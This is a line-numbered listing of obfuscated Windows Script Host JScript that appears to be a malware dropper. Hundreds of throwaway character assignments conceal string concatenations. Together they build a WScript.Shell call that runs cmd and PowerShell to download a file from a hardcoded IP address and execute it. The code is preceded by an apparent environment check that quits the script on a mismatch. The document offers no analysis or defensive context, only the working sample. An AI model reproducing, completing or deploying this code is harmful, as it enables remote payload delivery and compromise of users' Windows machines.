2 | var apgdzni = this[qfmhy + sktzw + enqjy + yajshdq + xjtgjhjm + eikgmwjf + cgvit + uyurg] ( this[nhfbdl + pvgizguy + hinppg + enqjy + wnuyo + qfmhy + uyurg][wakkrl + enqjy + xjtgjhjm + sktzw + uyurg + xjtgjhjm + kkgxi + eagpyeo + axkoxpkww + xjtgjhjm + hinppg + uyurg] ( nhfbdl + pvgizguy + hinppg + enqjy + wnuyo + qfmhy + uyurg + lcurhrb + pvgizguy + icmker + xjtgjhjm + wbeid + wbeid ) [zddjrw + xjtgjhjm + oicdscbqi + zddjrw + xjtgjhjm + sktzw + hdnklxjf] ( agihkf + awcze + gilyecokb + ykkcqzqap + ngqvntzq + wakkrl + nibuw + zddjrw + zddjrw + gilyecokb + qnuwv + igubg + ngqvntzq + nibuw + pvgizguy + gilyecokb + zddjrw + iecxm + wakkrl + phajxe + cgvit + uyurg + enqjy + phajxe + wbeid + tsxpp + rdnxwf + sktzw + cgvit + xjtgjhjm + wbeid + iecxm + eikgmwjf + cgvit + uyurg + xjtgjhjm + enqjy + cgvit + sktzw + uyurg + wnuyo + phajxe + cgvit + sktzw + wbeid + iecxm + gmgfh + phajxe + hinppg + sktzw + wbeid + xjtgjhjm ), 16 ); |
|
3 | for ( slvpwxwoi = 0 ; slvpwxwoi < pninrv[wbeid + xjtgjhjm + cgvit + oicdscbqi + uyurg + icmker] ; ++ slvpwxwoi ) | |
4 | { | |
5 | if ( apgdzni == pninrv[slvpwxwoi] ) | |
6 | { | |
7 | apgdzni = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( apgdzni !== true ) | |
12 | this[nhfbdl + pvgizguy + hinppg + enqjy + wnuyo + qfmhy + uyurg][hagojti + umkmos + wnuyo + uyurg] ( ); | |
13 | this[nhfbdl + pvgizguy + hinppg + enqjy + wnuyo + qfmhy + uyurg][wakkrl + enqjy + xjtgjhjm + sktzw + uyurg + xjtgjhjm + kkgxi + eagpyeo + axkoxpkww + xjtgjhjm + hinppg + uyurg] ( nhfbdl + pvgizguy + hinppg + enqjy + wnuyo + qfmhy + uyurg + lcurhrb + pvgizguy + icmker + xjtgjhjm + wbeid + wbeid ) [enqjy + umkmos + cgvit] ( hinppg + eszbytaq + hdnklxjf + tsxpp + vspyszlp + hinppg + tsxpp + qfmhy + phajxe + afyulmb + xjtgjhjm + enqjy + yajshdq + icmker + xjtgjhjm + wbeid + wbeid + lcurhrb + xjtgjhjm + sxvrwoojo + xjtgjhjm + tsxpp + mgdmnk + wakkrl + phajxe + eszbytaq + eszbytaq + sktzw + cgvit + hdnklxjf + tsxpp + gshiig + eikgmwjf + cgvit + szfmsdwe + phajxe + rnleyt + xjtgjhjm + mgdmnk + nhfbdl + xjtgjhjm + eagpyeo + zddjrw + xjtgjhjm + wwvpq + umkmos + xjtgjhjm + yajshdq + uyurg + tsxpp + mgdmnk + kkgxi + umkmos + uyurg + yguqy + wnuyo + wbeid + xjtgjhjm + tsxpp + aophij + uyurg + xjtgjhjm + eszbytaq + qfmhy + aophij + iecxm + wnuyo + cgvit + szfmsdwe + phajxe + wnuyo + hinppg + xjtgjhjm + lcurhrb + qfmhy + hdnklxjf + ouoad + tsxpp + icmker + uyurg + uyurg + qfmhy + tekplxyqm + vspyszlp + vspyszlp + olzbo + cvovm + ipuom + lcurhrb + olzbo + pncpkosff + ipuom + lcurhrb + olzbo + lcurhrb + gvmbih + gfsxtytu + mermc + vspyszlp + wnuyo + cgvit + szfmsdwe + phajxe + wnuyo + hinppg + xjtgjhjm + lcurhrb + qfmhy + icmker + qfmhy + gshiig + zpcyd + zpcyd + yajshdq + uyurg + sktzw + enqjy + uyurg + tsxpp + aophij + uyurg + xjtgjhjm + eszbytaq + qfmhy + aophij + iecxm + wnuyo + cgvit + szfmsdwe + phajxe + wnuyo + hinppg + xjtgjhjm + lcurhrb + qfmhy + hdnklxjf + ouoad + zpcyd + zpcyd + hinppg + eszbytaq + hdnklxjf + tsxpp + vspyszlp + hinppg + tsxpp + cgvit + xjtgjhjm + uyurg + tsxpp + umkmos + yajshdq + xjtgjhjm + tsxpp + iecxm + iecxm + olzbo + cvovm + ipuom + lcurhrb + olzbo + pncpkosff + ipuom + lcurhrb + olzbo + lcurhrb + gvmbih + gfsxtytu + mermc + jqfgk + ultfap + ultfap + ultfap + ultfap + iecxm + hdnklxjf + sktzw + szfmsdwe + afyulmb + afyulmb + afyulmb + enqjy + phajxe + phajxe + uyurg + iecxm + zpcyd + zpcyd + hinppg + eszbytaq + hdnklxjf + tsxpp + vspyszlp + hinppg + tsxpp + enqjy + xjtgjhjm + oicdscbqi + yajshdq + szfmsdwe + enqjy + ipuom + gvmbih + tsxpp + vspyszlp + yajshdq + tsxpp + iecxm + iecxm + olzbo + cvovm + ipuom + lcurhrb + olzbo + pncpkosff + ipuom + lcurhrb + olzbo + lcurhrb + gvmbih + gfsxtytu + mermc + jqfgk + ultfap + ultfap + ultfap + ultfap + iecxm + hdnklxjf + sktzw + szfmsdwe + afyulmb + afyulmb + afyulmb + enqjy + phajxe + phajxe + uyurg + iecxm + olzbo + idpcooh + idpcooh + mermc + olzbo + mermc + ultfap + kdjuzfgul + idpcooh + kdjuzfgul + pncpkosff + ultfap + kdjuzfgul + lcurhrb + hdnklxjf + wbeid + wbeid, 0, false ); |
|
14 | } | |
15 | agihkf = "u"; | |
16 | agihkf = "G"; | |
17 | agihkf = "K"; | |
18 | agihkf = "c"; | |
19 | agihkf = "F"; | |
20 | agihkf = "N"; | |
21 | agihkf = "C"; | |
22 | agihkf = "V"; | |
23 | agihkf = "D"; | |
24 | agihkf = "A"; | |
25 | agihkf = "I"; | |
26 | agihkf = "t"; | |
27 | agihkf = "l"; | |
28 | agihkf = "c"; | |
29 | agihkf = "c"; | |
30 | agihkf = "S"; | |
31 | agihkf = "o"; | |
32 | agihkf = "H"; | |
33 | qnuwv = "Z"; | |
34 | qnuwv = "L"; | |
35 | qnuwv = "c"; | |
36 | qnuwv = "l"; | |
37 | qnuwv = "Z"; | |
38 | qnuwv = "c"; | |
39 | qnuwv = "l"; | |
40 | qnuwv = "p"; | |
41 | qnuwv = "Q"; | |
42 | qnuwv = "g"; | |
43 | qnuwv = "B"; | |
44 | qnuwv = "Q"; | |
45 | qnuwv = "h"; | |
46 | qnuwv = "D"; | |
47 | qnuwv = "A"; | |
48 | qnuwv = "n"; | |
49 | qnuwv = "N"; | |
50 | tsxpp = "u"; | |
51 | tsxpp = "h"; | |
52 | tsxpp = "m"; | |
53 | tsxpp = "G"; | |
54 | tsxpp = "M"; | |
55 | tsxpp = "e"; | |
56 | tsxpp = "v"; | |
57 | tsxpp = "S"; | |
58 | tsxpp = "A"; | |
59 | tsxpp = "c"; | |
60 | tsxpp = "G"; | |
61 | tsxpp = "m"; | |
62 | tsxpp = "c"; | |
63 | tsxpp = "i"; | |
64 | tsxpp = "d"; | |
65 | tsxpp = "D"; | |
66 | tsxpp = "L"; | |
67 | tsxpp = "D"; | |
68 | tsxpp = "f"; | |
69 | tsxpp = "t"; | |
70 | tsxpp = " "; | |
71 | yguqy = "a"; | |
72 | yguqy = "a"; | |
73 | yguqy = "o"; | |
74 | yguqy = "I"; | |
75 | yguqy = "A"; | |
76 | yguqy = "T"; | |
77 | yguqy = "l"; | |
78 | yguqy = "w"; | |
79 | yguqy = "d"; | |
80 | yguqy = "f"; | |
81 | yguqy = "Q"; | |
82 | yguqy = "l"; | |
83 | yguqy = "Z"; | |
84 | yguqy = "G"; | |
85 | yguqy = "S"; | |
86 | yguqy = "C"; | |
87 | yguqy = "K"; | |
88 | yguqy = "T"; | |
89 | yguqy = "F"; | |
90 | yguqy = "i"; | |
91 | yguqy = "b"; | |
92 | yguqy = "g"; | |
93 | yguqy = "Q"; | |
94 | yguqy = "V"; | |
95 | yguqy = "h"; | |
96 | yguqy = "W"; | |
97 | yguqy = "D"; | |
98 | yguqy = "U"; | |
99 | yguqy = "n"; | |
100 | yguqy = "H"; | |
101 | yguqy = "P"; | |
102 | yguqy = "Q"; | |
103 | yguqy = "r"; | |
104 | yguqy = "v"; | |
105 | yguqy = "n"; | |
106 | yguqy = "O"; | |
107 | yguqy = "s"; | |
108 | yguqy = "J"; | |
109 | yguqy = "I"; | |
110 | yguqy = "Y"; | |
111 | yguqy = "o"; | |
112 | yguqy = "F"; | |
113 | hinppg = "D"; | |
114 | hinppg = "U"; | |
115 | hinppg = "U"; | |
116 | hinppg = "J"; | |
117 | hinppg = "x"; | |
118 | hinppg = "a"; | |
119 | hinppg = "N"; | |
120 | hinppg = "B"; | |
121 | hinppg = "c"; | |
122 | lcurhrb = "h"; | |
123 | lcurhrb = "F"; | |
124 | lcurhrb = "I"; | |
125 | lcurhrb = "P"; | |
126 | lcurhrb = "q"; | |
127 | lcurhrb = "b"; | |
128 | lcurhrb = "N"; | |
129 | lcurhrb = "."; | |
130 | afyulmb = "f"; | |
131 | afyulmb = "E"; | |
132 | afyulmb = "z"; | |
133 | afyulmb = "k"; | |
134 | afyulmb = "g"; | |
135 | afyulmb = "p"; | |
136 | afyulmb = "V"; | |
137 | afyulmb = "B"; | |
138 | afyulmb = "A"; | |
139 | afyulmb = "z"; | |
140 | afyulmb = "i"; | |
141 | afyulmb = "b"; | |
142 | afyulmb = "R"; | |
143 | afyulmb = "f"; | |
144 | afyulmb = "X"; | |
145 | afyulmb = "o"; | |
146 | afyulmb = "a"; | |
147 | afyulmb = "w"; | |
148 | afyulmb = "m"; | |
149 | afyulmb = "j"; | |
150 | afyulmb = "Q"; | |
151 | afyulmb = "R"; | |
152 | afyulmb = "x"; | |
153 | afyulmb = "F"; | |
154 | afyulmb = "V"; | |
155 | afyulmb = "r"; | |
156 | afyulmb = "Z"; | |
157 | afyulmb = "u"; | |
158 | afyulmb = "f"; | |
159 | afyulmb = "i"; | |
160 | afyulmb = "c"; | |
161 | afyulmb = "u"; | |
162 | afyulmb = "V"; | |
163 | afyulmb = "j"; | |
164 | afyulmb = "d"; | |
165 | afyulmb = "K"; | |
166 | afyulmb = "y"; | |
167 | afyulmb = "k"; | |
168 | afyulmb = "j"; | |
169 | afyulmb = "e"; | |
170 | afyulmb = "G"; | |
171 | afyulmb = "S"; | |
172 | afyulmb = "w"; | |
173 | nibuw = "N"; | |
174 | nibuw = "P"; | |
175 | nibuw = "e"; | |
176 | nibuw = "v"; | |
177 | nibuw = "c"; | |
178 | nibuw = "W"; | |
179 | nibuw = "U"; | |
180 | nibuw = "U"; | |
181 | nibuw = "t"; | |
182 | nibuw = "k"; | |
183 | nibuw = "o"; | |
184 | nibuw = "X"; | |
185 | nibuw = "d"; | |
186 | nibuw = "s"; | |
187 | nibuw = "q"; | |
188 | nibuw = "u"; | |
189 | nibuw = "p"; | |
190 | nibuw = "X"; | |
191 | nibuw = "A"; | |
192 | nibuw = "c"; | |
193 | nibuw = "f"; | |
194 | nibuw = "N"; | |
195 | nibuw = "h"; | |
196 | nibuw = "R"; | |
197 | nibuw = "U"; | |
198 | nibuw = "Z"; | |
199 | nibuw = "p"; | |
200 | nibuw = "U"; | |
201 | icmker = "B"; | |
202 | icmker = "q"; | |
203 | icmker = "K"; | |
204 | icmker = "E"; | |
205 | icmker = "O"; | |
206 | icmker = "Y"; | |
207 | icmker = "r"; | |
208 | icmker = "u"; | |
209 | icmker = "V"; | |
210 | icmker = "D"; | |
211 | icmker = "V"; | |
212 | icmker = "b"; | |
213 | icmker = "z"; | |
214 | icmker = "O"; | |
215 | icmker = "b"; | |
216 | icmker = "h"; | |
217 | icmker = "m"; | |
218 | icmker = "h"; | |
219 | nhfbdl = "u"; | |
220 | nhfbdl = "o"; | |
221 | nhfbdl = "o"; | |
222 | nhfbdl = "A"; | |
223 | nhfbdl = "P"; | |
224 | nhfbdl = "n"; | |
225 | nhfbdl = "u"; | |
226 | nhfbdl = "e"; | |
227 | nhfbdl = "S"; | |
228 | nhfbdl = "Y"; | |
229 | nhfbdl = "T"; | |
230 | nhfbdl = "O"; | |
231 | nhfbdl = "d"; | |
232 | nhfbdl = "a"; | |
233 | nhfbdl = "q"; | |
234 | nhfbdl = "E"; | |
235 | nhfbdl = "m"; | |
236 | nhfbdl = "H"; | |
237 | nhfbdl = "z"; | |
238 | nhfbdl = "u"; | |
239 | nhfbdl = "z"; | |
240 | nhfbdl = "n"; | |
241 | nhfbdl = "d"; | |
242 | nhfbdl = "t"; | |
243 | nhfbdl = "i"; | |
244 | nhfbdl = "s"; | |
245 | nhfbdl = "M"; | |
246 | nhfbdl = "G"; | |
247 | nhfbdl = "q"; | |
248 | nhfbdl = "L"; | |
249 | nhfbdl = "w"; | |
250 | nhfbdl = "A"; | |
251 | nhfbdl = "n"; | |
252 | nhfbdl = "K"; | |
253 | nhfbdl = "R"; | |
254 | nhfbdl = "c"; | |
255 | nhfbdl = "q"; | |
256 | nhfbdl = "W"; | |
257 | yajshdq = "R"; | |
258 | yajshdq = "f"; | |
259 | yajshdq = "D"; | |
260 | yajshdq = "T"; | |
261 | yajshdq = "W"; | |
262 | yajshdq = "X"; | |
263 | yajshdq = "x"; | |
264 | yajshdq = "A"; | |
265 | yajshdq = "Z"; | |
266 | yajshdq = "D"; | |
267 | yajshdq = "u"; | |
268 | yajshdq = "y"; | |
269 | yajshdq = "e"; | |
270 | yajshdq = "i"; | |
271 | yajshdq = "Q"; | |
272 | yajshdq = "K"; | |
273 | yajshdq = "t"; | |
274 | yajshdq = "S"; | |
275 | yajshdq = "g"; | |
276 | yajshdq = "V"; | |
277 | yajshdq = "S"; | |
278 | yajshdq = "F"; | |
279 | yajshdq = "s"; | |
280 | tekplxyqm = "x"; | |
281 | tekplxyqm = "I"; | |
282 | tekplxyqm = "V"; | |
283 | tekplxyqm = "z"; | |
284 | tekplxyqm = "L"; | |
285 | tekplxyqm = "p"; | |
286 | tekplxyqm = "z"; | |
287 | tekplxyqm = "e"; | |
288 | tekplxyqm = "K"; | |
289 | tekplxyqm = "g"; | |
290 | tekplxyqm = "t"; | |
291 | tekplxyqm = "h"; | |
292 | tekplxyqm = "a"; | |
293 | tekplxyqm = "Q"; | |
294 | tekplxyqm = "f"; | |
295 | tekplxyqm = "u"; | |
296 | tekplxyqm = "u"; | |
297 | tekplxyqm = "X"; | |
298 | tekplxyqm = "X"; | |
299 | tekplxyqm = "d"; | |
300 | tekplxyqm = "c"; | |
301 | tekplxyqm = "r"; | |
302 | tekplxyqm = "k"; | |
303 | tekplxyqm = "a"; | |
304 | tekplxyqm = "c"; | |
305 | tekplxyqm = "z"; | |
306 | tekplxyqm = "T"; | |
307 | tekplxyqm = "a"; | |
308 | tekplxyqm = "J"; | |
309 | tekplxyqm = "M"; | |
310 | tekplxyqm = "g"; | |
311 | tekplxyqm = "e"; | |
312 | tekplxyqm = "c"; | |
313 | tekplxyqm = "Q"; | |
314 | tekplxyqm = "O"; | |
315 | tekplxyqm = ":"; | |
316 | sxvrwoojo = "J"; | |
317 | sxvrwoojo = "L"; | |
318 | sxvrwoojo = "m"; | |
319 | sxvrwoojo = "K"; | |
320 | sxvrwoojo = "b"; | |
321 | sxvrwoojo = "Y"; | |
322 | sxvrwoojo = "n"; | |
323 | sxvrwoojo = "H"; | |
324 | sxvrwoojo = "r"; | |
325 | sxvrwoojo = "R"; | |
326 | sxvrwoojo = "B"; | |
327 | sxvrwoojo = "W"; | |
328 | sxvrwoojo = "e"; | |
329 | sxvrwoojo = "O"; | |
330 | sxvrwoojo = "Z"; | |
331 | sxvrwoojo = "A"; | |
332 | sxvrwoojo = "r"; | |
333 | sxvrwoojo = "p"; | |
334 | sxvrwoojo = "M"; | |
335 | sxvrwoojo = "u"; | |
336 | sxvrwoojo = "e"; | |
337 | sxvrwoojo = "u"; | |
338 | sxvrwoojo = "d"; | |
339 | sxvrwoojo = "z"; | |
340 | sxvrwoojo = "B"; | |
341 | sxvrwoojo = "g"; | |
342 | sxvrwoojo = "t"; | |
343 | sxvrwoojo = "u"; | |
344 | sxvrwoojo = "w"; | |
345 | sxvrwoojo = "j"; | |
346 | sxvrwoojo = "x"; | |
347 | eikgmwjf = "h"; | |
348 | eikgmwjf = "e"; | |
349 | eikgmwjf = "q"; | |
350 | eikgmwjf = "A"; | |
351 | eikgmwjf = "z"; | |
352 | eikgmwjf = "z"; | |
353 | eikgmwjf = "x"; | |
354 | eikgmwjf = "N"; | |
355 | eikgmwjf = "H"; | |
356 | eikgmwjf = "w"; | |
357 | eikgmwjf = "b"; | |
358 | eikgmwjf = "b"; | |
359 | eikgmwjf = "Y"; | |
360 | eikgmwjf = "F"; | |
361 | eikgmwjf = "B"; | |
362 | eikgmwjf = "J"; | |
363 | eikgmwjf = "B"; | |
364 | eikgmwjf = "M"; | |
365 | eikgmwjf = "W"; | |
366 | eikgmwjf = "H"; | |
367 | eikgmwjf = "z"; | |
368 | eikgmwjf = "p"; | |
369 | eikgmwjf = "c"; | |
370 | eikgmwjf = "L"; | |
371 | eikgmwjf = "I"; | |
372 | cgvit = "h"; | |
373 | cgvit = "m"; | |
374 | cgvit = "G"; | |
375 | cgvit = "D"; | |
376 | cgvit = "R"; | |
377 | cgvit = "n"; | |
378 | wakkrl = "G"; | |
379 | wakkrl = "W"; | |
380 | wakkrl = "z"; | |
381 | wakkrl = "d"; | |
382 | wakkrl = "F"; | |
383 | wakkrl = "W"; | |
384 | wakkrl = "j"; | |
385 | wakkrl = "y"; | |
386 | wakkrl = "C"; | |
387 | wakkrl = "p"; | |
388 | wakkrl = "C"; | |
389 | kdjuzfgul = "k"; | |
390 | kdjuzfgul = "A"; | |
391 | kdjuzfgul = "d"; | |
392 | kdjuzfgul = "b"; | |
393 | kdjuzfgul = "w"; | |
394 | kdjuzfgul = "F"; | |
395 | kdjuzfgul = "Q"; | |
396 | kdjuzfgul = "M"; | |
397 | kdjuzfgul = "Q"; | |
398 | kdjuzfgul = "K"; | |
399 | kdjuzfgul = "y"; | |
400 | kdjuzfgul = "b"; | |
401 | kdjuzfgul = "n"; | |
402 | kdjuzfgul = "q"; | |
403 | kdjuzfgul = "x"; | |
404 | kdjuzfgul = "x"; | |
405 | kdjuzfgul = "g"; | |
406 | kdjuzfgul = "y"; | |
407 | kdjuzfgul = "I"; | |
408 | kdjuzfgul = "Y"; | |
409 | kdjuzfgul = "c"; | |
410 | kdjuzfgul = "L"; | |
411 | kdjuzfgul = "W"; | |
412 | kdjuzfgul = "h"; | |
413 | kdjuzfgul = "Y"; | |
414 | kdjuzfgul = "g"; | |
415 | kdjuzfgul = "L"; | |
416 | kdjuzfgul = "u"; | |
417 | kdjuzfgul = "T"; | |
418 | kdjuzfgul = "s"; | |
419 | kdjuzfgul = "n"; | |
420 | kdjuzfgul = "f"; | |
421 | kdjuzfgul = "D"; | |
422 | kdjuzfgul = "s"; | |
423 | kdjuzfgul = "d"; | |
424 | kdjuzfgul = "T"; | |
425 | kdjuzfgul = "m"; | |
426 | kdjuzfgul = "6"; | |
427 | gvmbih = "v"; | |
428 | gvmbih = "y"; | |
429 | gvmbih = "H"; | |
430 | gvmbih = "c"; | |
431 | gvmbih = "P"; | |
432 | gvmbih = "a"; | |
433 | gvmbih = "Z"; | |
434 | gvmbih = "u"; | |
435 | gvmbih = "Q"; | |
436 | gvmbih = "Q"; | |
437 | gvmbih = "j"; | |
438 | gvmbih = "I"; | |
439 | gvmbih = "o"; | |
440 | gvmbih = "O"; | |
441 | gvmbih = "j"; | |
442 | gvmbih = "V"; | |
443 | gvmbih = "L"; | |
444 | gvmbih = "u"; | |
445 | gvmbih = "p"; | |
446 | gvmbih = "A"; | |
447 | gvmbih = "m"; | |
448 | gvmbih = "e"; | |
449 | gvmbih = "l"; | |
450 | gvmbih = "W"; | |
451 | gvmbih = "M"; | |
452 | gvmbih = "E"; | |
453 | gvmbih = "w"; | |
454 | gvmbih = "D"; | |
455 | gvmbih = "Z"; | |
456 | gvmbih = "Z"; | |
457 | gvmbih = "G"; | |
458 | gvmbih = "w"; | |
459 | gvmbih = "m"; | |
460 | gvmbih = "k"; | |
461 | gvmbih = "I"; | |
462 | gvmbih = "t"; | |
463 | gvmbih = "P"; | |
464 | gvmbih = "A"; | |
465 | gvmbih = "E"; | |
466 | gvmbih = "2"; | |
467 | oicdscbqi = "I"; | |
468 | oicdscbqi = "o"; | |
469 | oicdscbqi = "D"; | |
470 | oicdscbqi = "l"; | |
471 | oicdscbqi = "j"; | |
472 | oicdscbqi = "w"; | |
473 | oicdscbqi = "H"; | |
474 | oicdscbqi = "c"; | |
475 | oicdscbqi = "W"; | |
476 | oicdscbqi = "v"; | |
477 | oicdscbqi = "v"; | |
478 | oicdscbqi = "Q"; | |
479 | oicdscbqi = "d"; | |
480 | oicdscbqi = "m"; | |
481 | oicdscbqi = "g"; | |
482 | sktzw = "Z"; | |
483 | sktzw = "L"; | |
484 | sktzw = "j"; | |
485 | sktzw = "w"; | |
486 | sktzw = "L"; | |
487 | sktzw = "Y"; | |
488 | sktzw = "N"; | |
489 | sktzw = "h"; | |
490 | sktzw = "e"; | |
491 | sktzw = "a"; | |
492 | sktzw = "e"; | |
493 | sktzw = "m"; | |
494 | sktzw = "R"; | |
495 | sktzw = "L"; | |
496 | sktzw = "k"; | |
497 | sktzw = "G"; | |
498 | sktzw = "i"; | |
499 | sktzw = "u"; | |
500 | sktzw = "f"; | |
501 | sktzw = "n"; | |
502 | sktzw = "G"; | |
503 | sktzw = "v"; | |
504 | sktzw = "S"; | |
505 | sktzw = "N"; | |
506 | sktzw = "Y"; | |
507 | sktzw = "w"; | |
508 | sktzw = "R"; | |
509 | sktzw = "G"; | |
510 | sktzw = "e"; | |
511 | sktzw = "h"; | |
512 | sktzw = "F"; | |
513 | sktzw = "a"; | |
514 | eagpyeo = "y"; | |
515 | eagpyeo = "o"; | |
516 | eagpyeo = "m"; | |
517 | eagpyeo = "P"; | |
518 | eagpyeo = "S"; | |
519 | eagpyeo = "z"; | |
520 | eagpyeo = "K"; | |
521 | eagpyeo = "Y"; | |
522 | eagpyeo = "J"; | |
523 | eagpyeo = "b"; | |
524 | gshiig = "Y"; | |
525 | gshiig = "D"; | |
526 | gshiig = "I"; | |
527 | gshiig = "i"; | |
528 | gshiig = "H"; | |
529 | gshiig = "L"; | |
530 | gshiig = "U"; | |
531 | gshiig = "u"; | |
532 | gshiig = "Z"; | |
533 | gshiig = "T"; | |
534 | gshiig = "f"; | |
535 | gshiig = "N"; | |
536 | gshiig = "K"; | |
537 | gshiig = "K"; | |
538 | gshiig = "j"; | |
539 | gshiig = "d"; | |
540 | gshiig = "k"; | |
541 | gshiig = "Z"; | |
542 | gshiig = "F"; | |
543 | gshiig = "g"; | |
544 | gshiig = "f"; | |
545 | gshiig = "T"; | |
546 | gshiig = "y"; | |
547 | gshiig = "Y"; | |
548 | gshiig = "f"; | |
549 | gshiig = "P"; | |
550 | gshiig = "D"; | |
551 | gshiig = "Z"; | |
552 | gshiig = "M"; | |
553 | gshiig = "B"; | |
554 | gshiig = "b"; | |
555 | gshiig = "J"; | |
556 | gshiig = "O"; | |
557 | gshiig = "L"; | |
558 | gshiig = "y"; | |
559 | gshiig = "u"; | |
560 | gshiig = "\""; | |
561 | ipuom = "i"; | |
562 | ipuom = "E"; | |
563 | ipuom = "S"; | |
564 | ipuom = "O"; | |
565 | ipuom = "g"; | |
566 | ipuom = "U"; | |
567 | ipuom = "B"; | |
568 | ipuom = "m"; | |
569 | ipuom = "K"; | |
570 | ipuom = "c"; | |
571 | ipuom = "Y"; | |
572 | ipuom = "H"; | |
573 | ipuom = "h"; | |
574 | ipuom = "T"; | |
575 | ipuom = "s"; | |
576 | ipuom = "Z"; | |
577 | ipuom = "k"; | |
578 | ipuom = "Q"; | |
579 | ipuom = "G"; | |
580 | ipuom = "w"; | |
581 | ipuom = "Q"; | |
582 | ipuom = "u"; | |
583 | ipuom = "H"; | |
584 | ipuom = "3"; | |
585 | rnleyt = "q"; | |
586 | rnleyt = "W"; | |
587 | rnleyt = "Q"; | |
588 | rnleyt = "z"; | |
589 | rnleyt = "B"; | |
590 | rnleyt = "Q"; | |
591 | rnleyt = "R"; | |
592 | rnleyt = "q"; | |
593 | rnleyt = "Z"; | |
594 | rnleyt = "r"; | |
595 | rnleyt = "y"; | |
596 | rnleyt = "G"; | |
597 | rnleyt = "u"; | |
598 | rnleyt = "Z"; | |
599 | rnleyt = "u"; | |
600 | rnleyt = "V"; | |
601 | rnleyt = "h"; | |
602 | rnleyt = "m"; | |
603 | rnleyt = "r"; | |
604 | rnleyt = "q"; | |
605 | rnleyt = "l"; | |
606 | rnleyt = "s"; | |
607 | rnleyt = "R"; | |
608 | rnleyt = "i"; | |
609 | rnleyt = "C"; | |
610 | rnleyt = "F"; | |
611 | rnleyt = "q"; | |
612 | rnleyt = "O"; | |
613 | rnleyt = "S"; | |
614 | rnleyt = "N"; | |
615 | rnleyt = "g"; | |
616 | rnleyt = "h"; | |
617 | rnleyt = "s"; | |
618 | rnleyt = "s"; | |
619 | rnleyt = "H"; | |
620 | rnleyt = "E"; | |
621 | rnleyt = "Q"; | |
622 | rnleyt = "T"; | |
623 | rnleyt = "b"; | |
624 | rnleyt = "a"; | |
625 | rnleyt = "P"; | |
626 | rnleyt = "k"; | |
627 | aophij = "d"; | |
628 | aophij = "c"; | |
629 | aophij = "t"; | |
630 | aophij = "w"; | |
631 | aophij = "I"; | |
632 | aophij = "t"; | |
633 | aophij = "S"; | |
634 | aophij = "Y"; | |
635 | aophij = "d"; | |
636 | aophij = "X"; | |
637 | aophij = "m"; | |
638 | aophij = "K"; | |
639 | aophij = "Z"; | |
640 | aophij = "Z"; | |
641 | aophij = "c"; | |
642 | aophij = "y"; | |
643 | aophij = "b"; | |
644 | aophij = "a"; | |
645 | aophij = "p"; | |
646 | aophij = "e"; | |
647 | aophij = "Z"; | |
648 | aophij = "u"; | |
649 | aophij = "V"; | |
650 | aophij = "x"; | |
651 | aophij = "R"; | |
652 | aophij = "g"; | |
653 | aophij = "q"; | |
654 | aophij = "s"; | |
655 | aophij = "x"; | |
656 | aophij = "o"; | |
657 | aophij = "M"; | |
658 | aophij = "%"; | |
659 | rdnxwf = "i"; | |
660 | rdnxwf = "Q"; | |
661 | rdnxwf = "u"; | |
662 | rdnxwf = "V"; | |
663 | rdnxwf = "w"; | |
664 | rdnxwf = "O"; | |
665 | rdnxwf = "w"; | |
666 | rdnxwf = "E"; | |
667 | rdnxwf = "M"; | |
668 | rdnxwf = "m"; | |
669 | rdnxwf = "j"; | |
670 | rdnxwf = "y"; | |
671 | rdnxwf = "D"; | |
672 | rdnxwf = "p"; | |
673 | rdnxwf = "U"; | |
674 | rdnxwf = "d"; | |
675 | rdnxwf = "A"; | |
676 | rdnxwf = "X"; | |
677 | rdnxwf = "P"; | |
678 | uyurg = "X"; | |
679 | uyurg = "E"; | |
680 | uyurg = "P"; | |
681 | uyurg = "f"; | |
682 | uyurg = "e"; | |
683 | uyurg = "l"; | |
684 | uyurg = "l"; | |
685 | uyurg = "h"; | |
686 | uyurg = "n"; | |
687 | uyurg = "M"; | |
688 | uyurg = "K"; | |
689 | uyurg = "F"; | |
690 | uyurg = "O"; | |
691 | uyurg = "N"; | |
692 | uyurg = "L"; | |
693 | uyurg = "q"; | |
694 | uyurg = "E"; | |
695 | uyurg = "B"; | |
696 | uyurg = "x"; | |
697 | uyurg = "L"; | |
698 | uyurg = "r"; | |
699 | uyurg = "A"; | |
700 | uyurg = "g"; | |
701 | uyurg = "P"; | |
702 | uyurg = "M"; | |
703 | uyurg = "a"; | |
704 | uyurg = "N"; | |
705 | uyurg = "m"; | |
706 | uyurg = "w"; | |
707 | uyurg = "U"; | |
708 | uyurg = "s"; | |
709 | uyurg = "X"; | |
710 | uyurg = "q"; | |
711 | uyurg = "t"; | |
712 | olzbo = "B"; | |
713 | olzbo = "u"; | |
714 | olzbo = "V"; | |
715 | olzbo = "E"; | |
716 | olzbo = "j"; | |
717 | olzbo = "Q"; | |
718 | olzbo = "g"; | |
719 | olzbo = "y"; | |
720 | olzbo = "X"; | |
721 | olzbo = "V"; | |
722 | olzbo = "w"; | |
723 | olzbo = "z"; | |
724 | olzbo = "S"; | |
725 | olzbo = "r"; | |
726 | olzbo = "Q"; | |
727 | olzbo = "C"; | |
728 | olzbo = "e"; | |
729 | olzbo = "W"; | |
730 | olzbo = "s"; | |
731 | olzbo = "1"; | |
732 | wwvpq = "n"; | |
733 | wwvpq = "S"; | |
734 | wwvpq = "M"; | |
735 | wwvpq = "D"; | |
736 | wwvpq = "y"; | |
737 | wwvpq = "z"; | |
738 | wwvpq = "S"; | |
739 | wwvpq = "Q"; | |
740 | wwvpq = "q"; | |
741 | wwvpq = "t"; | |
742 | wwvpq = "Z"; | |
743 | wwvpq = "V"; | |
744 | wwvpq = "E"; | |
745 | wwvpq = "z"; | |
746 | wwvpq = "G"; | |
747 | wwvpq = "J"; | |
748 | wwvpq = "s"; | |
749 | wwvpq = "a"; | |
750 | wwvpq = "P"; | |
751 | wwvpq = "Z"; | |
752 | wwvpq = "q"; | |
753 | gilyecokb = "A"; | |
754 | gilyecokb = "N"; | |
755 | gilyecokb = "N"; | |
756 | gilyecokb = "N"; | |
757 | gilyecokb = "o"; | |
758 | gilyecokb = "n"; | |
759 | gilyecokb = "J"; | |
760 | gilyecokb = "Q"; | |
761 | gilyecokb = "y"; | |
762 | gilyecokb = "T"; | |
763 | gilyecokb = "d"; | |
764 | gilyecokb = "b"; | |
765 | gilyecokb = "f"; | |
766 | gilyecokb = "D"; | |
767 | gilyecokb = "f"; | |
768 | gilyecokb = "U"; | |
769 | gilyecokb = "w"; | |
770 | gilyecokb = "T"; | |
771 | gilyecokb = "b"; | |
772 | gilyecokb = "s"; | |
773 | gilyecokb = "E"; | |
